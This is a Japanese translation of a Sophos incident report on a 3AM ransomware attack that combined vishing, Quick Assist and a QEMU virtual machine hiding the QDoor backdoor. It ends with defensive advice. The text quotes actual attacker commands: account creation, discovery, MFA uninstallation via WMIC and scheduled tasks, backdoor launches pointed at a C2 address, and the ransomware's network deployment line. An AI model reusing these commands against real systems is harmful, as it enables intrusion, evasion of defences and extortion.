** 本記事は、A familiar playbook with a twist: 3AM ransomware actors dropped virtual machine with vishing and Quick Assist の翻訳です。最新の情報は英語記事をご覧ください。**
ランサムウェアは通常、機会便乗型の犯罪です。 攻撃者は、すぐに発見できる脆弱性やセキュリティの弱点を突いて攻撃を仕掛けます。一般的に最初に侵入されるのは、パッチが適用されていないインターネット接続ソフトウェア、脆弱なネットワークエッジデバイス、多要素認証が導入されていな仮想プライベートネットワークの受信ポートなどです。しかし、攻撃の中には、より標的が絞られ、攻撃前の徹底した偵察や、標的となる従業員の特定を行うものもあります。
ソフォスは、Microsoft が 2024 年 5 月に報告した攻撃パターンを用いる複数のランサムウェア攻撃者を追跡し続けています。この攻撃パターンは、脅威グループ「Storm-1811」と関連するもので、標的組織の従業員にメールを大量に送信してシステムに過負荷をかけ、その後 Microsoft Teams 経由でテクニカルサポートチームを装った音声またはビデオ通話をかけて、その従業員にリモートアクセスを許可させる手口です。2024 年 11 月から 2025 年 1 月中旬にかけて、ソフォスはこれらの手法を使用した 2 つの異なる脅威クラスターを 15 件超のインシデントで記録しました。さらに調査を進めた結果、この手法を使用した 55 件を超える攻撃の試みが確認されています。
2025 年第 1 四半期、Sophos Incident Response は、3AM ランサムウェアグループと関連のある攻撃者に狙われた組織を支援しました。この攻撃のパターンは、多くの点で過去のメール爆弾攻撃と類似していました。しかし、ソフォスが以前にこれらの戦術と関連付けた 2 つの脅威クラスターと関連がある Teams の「ビッシング」攻撃とは異なる特徴が数多くありました。
今回のケースでは、攻撃者は組織の IT 部門の電話番号を偽装していました。この攻撃には、侵害されたコンピュータに仮想マシンを展開し、エンドポイント保護ソフトウェアが監視出来ない場所に最初の足場を築く手順が含まれていました。ランサムウェア攻撃自体は阻止されましたが、攻撃者はランサムウェアを起動するまでの 9 日間ネットワークに滞留し、標的組織のネットワークからデータを盗み出すことに成功しました。
3AM の攻撃者は、攻撃前に偵察を行い、組織に関する情報を収集しました。収集された情報には、従業員のメールアドレスや IT 部門の電話番号が含まれており、 攻撃のカスタマイズに利用されました。
3AM ランサムウェア
2023 年 9 月に Symantec によって初めて報告された 3AM は、BlackSuit / Royal ランサムウェアをリブランディングしたものであり、解散した Conti グループの中心チームの 1 つに関連していることが、Intrinsic をはじめとする組織の調査で明らかになっています。流出した BlackBasta ランサムウェアのチャットログでも言及されていた 3AM は、Microsoft Teams ベースのビッシング攻撃に関与した BlackBasta 関連の攻撃者とつながりがあり、Sophos MDR はこれを STAC5777 として追跡しています。
3AM の攻撃者が今回のケースおよび STAC5777 のケースで用いたボイスフィッシング (ビッシング) 手法は、流出した BlackBasta の情報で議論されていました。 2024 年 5 月にチャットにビッシング電話オペレーター用のスクリプト全文が投稿され、攻撃者が Microsoft Teams アカウントの購入を開始した 2023 年秋頃から、ビッシングの利用に関する調査が始まりました。その頃、BlackBasta の攻撃者は「TeamsPhisher」というオープンソースツールのテストを実施しました。
1 日目と 2 日目
初期侵害とバックドアの展開
攻撃は、メール爆弾から始まりました。 偵察中に入手した従業員のメールアドレスが、複数のメールリストへの登録に使用されました。 攻撃の 1 日目、主な標的となった従業員は、3 分間に 24 通の迷惑メールを受信しました。
メールが届き始めると、攻撃者は会社の IT 部門の電話番号を偽装し、VoIP を使用して従業員に電話をかけました。送り付けておいたメールに基づいて、従業員に対してソーシャルエンジニアリングを行い、Microsoft クイックアシストを使用してコンピュータへのリモートアクセスを許可させました。
Microsoft クイックアシストは、Windows 10 (バージョン 1607 以降) および Windows 11 システムにデフォルトでインストールされています。ただし、最近の更新で Microsoft はクイックアシストを Microsoft Store に移したため、アクティベートするには Store から更新または再インストールする必要があります。インストールされている場合には、キーボードショートカット (Ctrl + Windows キー + Q) から起動できます。
従業員は偽電話に騙され、クイックアシストを介して攻撃者にアクセスを許可しました。攻撃者はすでに実行中の Chrome セッションを利用して新しいタブを開き、Microsoft とクイックアシストに関連するドメインを偽装した作成されたばかりのドメイン (msquick[.]link) にアクセスしました。このサイトは、ワンタイムテキストメッセージサービス (1ty[.]me) にリダイレクトされ、Google ドライブのフォルダー内に「UpdatePackage_excic.zip」という名前のアーカイブを含んだ URL が送信されました。このアーカイブは、\ProgramData\UpdatePackage_exic\ ディレクトリに抽出されました。
防御回避と初期コマンドアンドコントロール
ペイロードには、VBS スクリプト (Update.vbs)、Qemu エミュレーターバイナリ、および仮想ディスクが含まれていました。
攻撃者は次のように、コマンドプロンプトから VBS スクリプトを実行して、Qemu エミュレーター内で Windows 7 仮想マシンを起動し、標的システムのネットワークインターフェースに接続しました (MITRE ATT&CK 手法「T1610-Deploy Container」)。
“C:\ProgramData\UpdatePackage_excic\wexe” -m 4096 – hda Update_excic.acow2 – netdev user,id=myneto -device e1000,netdev=mynetO – cpu max – display none
Windows 7 仮想マシンにはトロイの木馬「QDoor」が事前にインストールされていました。QDoor は、ConnectWise が 2024 年 9 月に報告したネットワークトンネルを作成するバックドアで、Qt ネットワークライブラリを使用します。Qemu クライアントのバインディングを介して標的デバイスのネットワークアダプターに接続し、ハードコードされた IP アドレス (88.118.167[.]239:443) に接続しました。このアドレスは、ConnectWise が報告した Blacksuit ランサムウェアのケースと、Sophos Managed Detection and Response が観測した QDoor を使用した Lynx ランサムウェア攻撃の両方で記録されています。また、このアドレスは、リトアニアのインターネットサービスプロバイダーと関連しています。
攻撃者はこのバックドアを使い、Sophos XDR エンドポイントソフトウェアによる検出を回避しながら、標的組織のネットワークに足場を築くことに成功しました。Qemu はインストールを必要としないため、管理者権限がなくても展開が可能でした。また、仮想マシンに対するアプリケーションコントロールは有効化されていませんでした。
この時点で、攻撃者が通信と制御を確立したため、Microsoft クイックアシストのセッションは終了しました。
探索、ラテラルムーブメント、常駐化
攻撃者は QEMU 仮想マシン内のツールを使用して、ドメインサービスアカウントを乗っ取りました。最初の侵害から 5 時間後、攻撃者はそのアカウントと Windows Management Instrumentation Command-line (WMIC) ユーティリティを使用して、組織のサーバーの 1 つで PowerShell を実行しました。
攻撃者は PowerShell を利用して、サーバー上でアクティブなユーザーセッションを持つアカウントを確認し、そのシステムに新規アカウントを作成し、そのアカウントをローカルの Administrators グループに追加するために、以下のコマンドを実行しました。
exe net1 localgroup administrators net1 localgoup Administrators [標的組織の名称] SupportUser /add net1 user [標的組織の名称] SupportUser Gr@@@ndbabis11 /add net1 localgroup Administrators [標的組織の名称] SupportUser /add
攻撃者は次に、新規作成したアカウントを使用して、作成したローカル管理者アカウント経由でサーバーにリモートデスクトップセッションを確立しました。そして、追加の外部アクセスを確立するため、XEOX のクラウドポータルを活用する商用リモートマシン管理 (RMM) ツール「XEOXRemote」をインストールしました。
この活動の後、ドメイン管理者アカウントも侵害されました。残念ながら、その侵害が発生した経緯を示すフォレンジックアーティファクトは見つかりませんでした。攻撃者はドメイン管理者として、侵害されたサーバー上で以下の発見コマンドを実行しました。
C: \Windows\system32\control.exe netconnections ipconfig /all C: \Windows \system32\netl sessions net group "domain Admins" /domain wmic product get name, version exe quser /server:[内部 IP アドレス] quser /server:[内部 IP アドレス] quser nitest / DOMAIN_TRUSTS nltest /dclist: whoami /all
攻撃者はまた、「ping」コマンドを使用して、ネットワーク上の複数のホストへの接続をテストしました。このインシデントの残りの期間中、攻撃者は侵害されたドメイン管理者アカウントを使用して、ネットワーク上の他の 9 台のホストに侵入し、そこでも同様の探索コマンドを実行しました。その結果は、複数のファイル (pc.txt、dir.txt、および a1.txt) に保存されました。pc.txt には内部 IP アドレスのリストが含まれていました。複数の他のホストには、レジストリで RDP を有効化しファイアウォールを開く C[:]\ProgramData\d.bat ファイルがドロップされていました。
2 日目の速い段階で、攻撃者は最初の足場を放棄し、QEMU エミュレーターをシャットダウンしました。その後のすべての活動は、対話型セッション用にリモートデスクトップ経由で、コマンドやバイナリのリモート実行用に XEOX と WMIC 経由で行われました。
3 日目
防御回避の失敗
標的となった組織は、1 台のサーバーを除くすべてのデバイスに Sophos XDR エンドポイントプロテクションを事前にインストールしていました。 すべてのユーザーアカウントに対して、RDP アクセスに多要素認証 (MFA) が実装されていました。これらの対策により、攻撃者によるラテラルムーブメントの試みはさらに困難になりました。
MFA が導入されていたため、攻撃者は RDP 経由で対話型セッションを確立できなくなりました。ただし、WMIC およびリモートの PowerShell アクティビティが継続的に使用されるのを防止することはできませんでした。
攻撃者は MFA のアンインストールを次の 3 つの方法で試しましたが、すべて失敗しました。
WMIC コマンドを使用:
wmic product where "name=Duo Authentication for Windows Logon x64" call uninstall /nointeractive
システムコンテキストで実行するように設計されているスケジュールタスク内にネストされた、WMIC コマンドを使用:
SCHTASKS /s [内部 IP アドレス]/RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c wmic product where name="Duo Authentication for Windows Logon x64" call uninstall /nointeractive" /sc ONCE /sd 01/01/2025 /st 00:00
このタスク名は、不満を抱いた Conti のアフィリエイトが 2021 年に流出させた Conti プレイブックで使用されていたものです。攻撃者はコストをかけずに簡単に変更できるにもかかわらず、4 年後の現在も元 Conti アフィリエイトによって使用されています。
プロダクト ID に基づいて MFA をアンインストールするための MsiExec コマンドを使用:
- msiexec /X [Duo Product ID] /gn /norestart
攻撃者はさらに、2 台のサーバーでソフォスのエンドポイントプロテクションを無効化するため、EDR Sandblaster (EDRキラー) の展開を試みましたが、これも失敗に終わりました。
データの窃取
2 つのホストで、攻撃者は Microsoft、Google、Amazon、Dropbox などのサービスに対応する正規のクラウド同期ツール「GoodSync」をインストールしました。その後、GoodSync を使用して、これらのサーバーから約 868 GB のデータをクラウドストレージプロバイダーである Backblaze にアップロードしました。
5 日目
バックドアの展開が阻止される
攻撃者は別のサーバーにアクセスし、リモートアクセスツール「Syncro Live Agent」 (現在の名称は「Synchro XMM」) をリモートでインストールしました。証拠によると、このツールは攻撃者に使用された形跡はありません。また、WMIC コマンドを使用して、リモートアクセス型トロイの木馬 QDoor の 2 つのコピーをディスクに展開し、偽装のために vol.exe と svchost.exe という名前を付けました。
- wmic / node:"[ホスト名]" process call create "cmd /c C:\ProgramData\vol.exe 172.86.121[.]134 - wmic /node:[ローカル IP アドレス]process call create "cmd /c C:\ProgramData\svchost.exe "172.86.121[.]134"
vol.exe と svchost.exe は、ソフォスによって QDoor マルウェアとしてすでに特定、検出され、実行が阻止されていた同じ悪意のあるバイナリファイルのコピーでした。
9 日目
ラテラルムーブメントに失敗
攻撃者は、RDP を通じて他のシステムへのアクセスを繰り返し試みましたが、MFA コントロールによってブロックされました。最終的に、エンドポイント保護が適用されていない唯一のサーバーであった管理対象外のデバイスを発見し、これを悪用してネットワークに対して 3AM ランサムウェア攻撃をリモートで実行しました。
影響は限定的
攻撃者は、管理対象外デバイスにランサムウェアのバイナリを C:\L.exe として展開し、ネットワーク上の 88 台のコンピュータを標的とするコマンドを含むバッチファイル (1.bat) も展開しました。このバッチファイルは、特定された各ホストの C ドライブへのマッピングを試みました。1.bat から抜粋したコマンドの例:
- start 1l L.exe -k [ランサムウェアのポータルアクセスキー] -s 10 -m net -p \ \[ホスト IP アドレス]\c$
Sophos Endpoint の CryptoGuard 機能が、ソフォスの保護機能がインストールされたシステムでのリモート暗号化を阻止し、リモート活動をランサムウェアとして検出しました。ランサムウェアによる影響は主に、ランサムウェアが実行された管理対象外のホストに限定されていました。
結論
防御する側は、これらの攻撃手法、ツール、手順による影響を阻止または軽減するために、以下の措置を講じる必要があります。
従業員の意識向上
今回の 3AM インシデントや最近のランサムウェア攻撃のようなビッシング攻撃は、標的となった個人の混乱や、予期せぬ出来事 (たとえば、突然仕事中に大量の迷惑メールが届くなど) によって引き起こされる緊急性を利用し、その個人を欺くことで成立します。従業員がソーシャルエンジニアリングの手口を識別できるようにするために、IT サポートが従業員に連絡してくるのは、どのような場合でどのような方法を取るのか、また、テクニカルサポートをリモートで提供する際にどのツールを使用するのかを具体的に説明しておきます。
管理者アカウントとサービスアカウントの監査
複雑なパスワードの使用を強制し、ポリシーでアクセスを制限して不正使用を防止し、管理者アカウント間でパスワードの再利用がないことを確認してください。管理者アカウントを定期的に監査し、ローカル管理者アカウントを無効にしてください。 「最小権限の管理モデル」に関する Microsoft のガイドラインに従ってください。加えて、技術的な理由でサービスアカウントに多要素認証を適用できない場合には、ログイン時間に制限をかけ、タスクに必要な権限のみを付与してください。
ポリシードリブン型のアプリケーションコントロールをソフトウェアとスクリプトに展開する
ソフォスが提供するような XDR (Extended Detection and Response) 保護ツールを使用することで、組織の IT 環境内で正規の実行ファイルであっても不要なものをポリシーに基づいてブロックできます。組織内で使用されている正規のソフトウェアツールを特定し、予想外のものはブロックします。製品の実行 (QEMU やその他の仮想マシン (リンク先: 英語) 、リモートマシン管理ソフトウェア、リモートコントロールソフトウェアなど) を特定のユーザーまたはデバイスに制限できます。また、実行ポリシーにより、PowerShell の使用を特定の管理者アカウントに限定します。デジタル署名の検証により、信頼できないコードの実行を防止し、PowerShell の実行ポリシーを署名付きスクリプトのみ実行するように設定します。
MFA を実装し、リモートアクセスに厳格なコントロールを適用する
今回のケースでは、MFA 製品を使用したことで、ラテラルムーブメントとリモートアクセスが制限されました。企業・組織は、リモートアクセスの認証を強化し、ポリシーとネットワークセグメンテーションにより、ネットワーク外からアクセスできるシステムを制限するためのあらゆる手段を講じる必要があります。
ネットワークフィルタリングとネットワーク侵入防止の機能を使用して、不要なリモートアクセスをブロックする
ネットワークの重要なセグメントへのリモートアクセスに関連するポートへのアクセスをブロックし、リモートデスクトップアクセスをそのタスク用に指定されたサーバーに限定します。IPS フィルターを使用して、リモートコントロール、バックドア、データ窃取に関連している可能性のあるインバウンドおよびアウトバウンドのネットワークトラフィックをブロックしてください。このタイプの活動によってトリガーされる検出とアラートを作成してください。
Windows レジストリの編集を制限する
セキュリティソフトウェアやポリシーを迂回するために使用される設定と関連がある Windows レジストリのハブやキーについては、編集できるユーザーを制限してください。
今回の攻撃の IoC (セキュリティ侵害の痕跡) は、ソフォスの GitHub に公開されます。
謝辞
Sophos X-Ops は、本レポートの作成に協力した Sophos Incident Response の Nathan Mante、Harinder Bhathal、Michael Warner に謝意を表します。
